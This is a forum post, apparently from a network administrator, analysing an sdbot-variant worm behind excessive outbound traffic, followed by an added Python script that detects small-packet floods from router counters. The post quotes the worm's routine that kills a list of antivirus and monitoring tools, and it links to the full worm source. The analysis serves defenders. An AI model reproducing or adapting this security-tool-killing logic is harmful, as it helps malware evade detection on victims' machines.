Excessive Internet Traffic

// The packets are small, since I am seeing a large number of packets, but
// the bit count is low.
// 30 second input rate 72679000 bits/sec, 41033 packets/sec
// 30 second output rate 29208000 bits/sec, 7687 packets/sec
// Input bits per second are a little above normal, but the packet count
// would normally be under 10000 not 41000.
// Ideas?

This is likely a variant of what I foresee becoming the "next big pain", a
variant of sdbot, of which McAfee claims there are 4000 variants.

I've had to deal with quite a few (and climbing) infected users suffering
from this pain. We use a Packeteer and have listed the comps sending
outbound 445 garbage, and I've found that almost all have been infected by
one of the versions of this particular worm. Which of the 4000 versions it
is eludes me.

This is what I've seen so far. If you look at the machine sending the
traffic out, you're likely going to see a smorgasbord of junk in
c:\WINDOWS\system32 ... If you view the folder as a list, then sort by
date, you're likely to find a huge number of executables on the machine,
as well as logs, TFTP information, etc.

You can try opening up task manager but it will be useless...

Since I'm already getting more and more familiar with this pest, here is
what it does:

' Excerpt from the worm's source (see the wormcode.txt link at the end of
' this post). TerminateTask(name) is the worm's own helper, defined
' elsewhere in that source; it finds a process or window by name and kills
' it.
Public Sub AVkiller()
    On Error Resume Next
    Dim AVmonz As Variant
    Dim Cur As String
    Dim i As Integer
    ' Index 0 is a dummy entry, so the real list runs from 1 To 20.
    AVmonz = Array("", "AVP Monitor", _
                       "AntiVir", _
                       "Vshwin", _
                       "F-STOPW", _
                       "F-Secure", _
                       "vettray", _
                       "InoculateIT", _
                       "Norman Virus Control", _
                       "navpw32", _
                       "Norton AntiVirus", _
                       "Iomon98", _
                       "AVG", _
                       "NOD32", _
                       "Dr.Web", _
                       "Amon", _
                       "Trend PC-cillin", _
                       "File Monitor", _
                       "Registry Monitor", _
                       "Registry Editor", _
                       "Task Manager")
    ' Declaration of AV shitz: antivirus monitors plus the tools (Regmon,
    ' Filemon, regedit, Task Manager) you would use to find the worm.
    For i = 1 To UBound(AVmonz)
        ' kill'em all...
        Cur = AVmonz(i)
        ' convert to string and terminate the task :wink:
        Call TerminateTask(Cur)
    Next i
End Sub


Nifty huh? The virus installs itself in the registry under odd names
associated with Microsoft; for example, so far I've seen it installed in a
Run / RunOnce entry called Windows Security, Windows Update, etc. There is
no removal tool for this, and since it renders much antivirus software
useless, you can either have the user reinstall Windows, or you can search
the machine for instances of things created on the same date as the
serv32.exe program, or one of the other ones it installs.

Now... The worm seems to download 4 other programs I've always seen
running in conjunction with it: wupd.exe, which masquerades as "Windows
Update"; ftpd.exe, which opens up an ftp server on the infected machine and
goes around re-downloading various other viruses and worms onto the
infected machine; and one which I believe tries to infect other machines,
perhaps a la the Blaster worm.

Another program seems to randomly rename the viruses and worms once they
are downloaded, so for example, wupd.exe will probably turn into something
like A032424.exe the next time around, and so on and so forth.

So far, the students where I am seem to be getting this via file sharing;
one program that has been sticking out like a sore thumb is something
called ARES. It could also be spreading, again, through some of the
katrillion MS vulnerabilities and perhaps even the newly discovered "Drag
and Drop" vulnerability.

Drag and Drop vulnerabilities

So now there is also the "bling.exe" issue, which is the worm that "sniffs
out passwords" (http://isc.sans.org/diary.php?date=2004-09-12); this one
opens up an IRC connection to dump data out to some channel. I will
eventually (when I have some time) hexedit some of these to see what they
do and perhaps repost more information.

For a full view of what serv32.exe does, please check out the code at
http://www.infiltrated.net/wormcode.txt, which lists the original URL
(site down, so it's Google cached).
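The original question at the top of this thread spotted the infection from
two numbers in a `show interface` output: the packet rate had jumped from
under 10000 to 41000 pps while the bit rate barely moved, i.e. the packets
were small. The script below is an added example (not part of the original
post or the worm source) that automates that check. It parses the Cisco-style
rate lines, computes the average packet size, and flags a direction whose
pps is over a ceiling while the average packet is small. The two thresholds
(10000 pps, 300 bytes) are assumptions taken from the poster's "normally
under 10000" remark; the "normal" baseline sample is constructed for
contrast and is not from the thread.

```python
import re

# Constructed sample: the two rate lines quoted at the top of the thread.
SAMPLE_SHOW_INTERFACE = """\
  30 second input rate 72679000 bits/sec, 41033 packets/sec
  30 second output rate 29208000 bits/sec, 7687 packets/sec
"""

# Constructed "normal day" sample for the same link (made up for contrast;
# chosen so the bit rate is similar but the packet rate is under 10000).
BASELINE_SHOW_INTERFACE = """\
  30 second input rate 61000000 bits/sec, 8200 packets/sec
  30 second output rate 28000000 bits/sec, 7100 packets/sec
"""

# Matches e.g. "30 second input rate 72679000 bits/sec, 41033 packets/sec".
RATE_RE = re.compile(
    r"(?P<window>\d+)\s+second\s+(?P<dir>input|output)\s+rate\s+"
    r"(?P<bps>\d+)\s+bits/sec,\s+(?P<pps>\d+)\s+packets/sec"
)


def parse_rates(text):
    """Return {direction: (bits_per_sec, packets_per_sec)} from show interface text."""
    rates = {}
    for m in RATE_RE.finditer(text):
        rates[m.group("dir")] = (int(m.group("bps")), int(m.group("pps")))
    return rates


def avg_packet_bytes(bps, pps):
    """Average on-the-wire packet size implied by the two counters."""
    if pps == 0:
        return 0.0
    return bps / 8 / pps


def assess(text, pps_ceiling=10000, min_avg_bytes=300):
    """Flag a direction when the packet rate is high AND the packets are small.

    Thresholds are assumptions for this example: pps_ceiling comes from the
    poster's "normally under 10000"; min_avg_bytes separates scan/SYN-sized
    packets from ordinary file-transfer traffic on this link.
    """
    findings = {}
    for direction, (bps, pps) in parse_rates(text).items():
        avg = avg_packet_bytes(bps, pps)
        findings[direction] = {
            "bps": bps,
            "pps": pps,
            "avg_bytes": round(avg, 1),
            "suspicious": pps > pps_ceiling and avg < min_avg_bytes,
        }
    return findings


def pps_jump(current_text, baseline_text, factor=3.0):
    """Directions whose packet rate grew by more than `factor` over the baseline.

    This catches the "bits barely moved, packets exploded" pattern even on a
    link whose normal pps is nowhere near the fixed ceiling above.
    """
    current = parse_rates(current_text)
    baseline = parse_rates(baseline_text)
    jumped = []
    for direction in sorted(current):
        if direction not in baseline or baseline[direction][1] == 0:
            continue
        if current[direction][1] / baseline[direction][1] > factor:
            jumped.append(direction)
    return jumped


if __name__ == "__main__":
    for direction, f in assess(SAMPLE_SHOW_INTERFACE).items():
        flag = "SUSPICIOUS" if f["suspicious"] else "ok"
        print(f"{direction:6s} {f['pps']:6d} pps  avg {f['avg_bytes']:6.1f} B/pkt  {flag}")
    print("pps jump vs baseline:", pps_jump(SAMPLE_SHOW_INTERFACE, BASELINE_SHOW_INTERFACE))
```

On the quoted numbers the input side works out to about 221 bytes per
packet at 41033 pps and gets flagged, while the output side is about 475
bytes per packet at 7687 pps and does not; against the constructed baseline
the input pps has grown fivefold. Feed it the output of `show interface`
for each edge interface on a schedule and the flagged direction points you
at which side of the router to run the Packeteer-style "who is sending
outbound 445" query on.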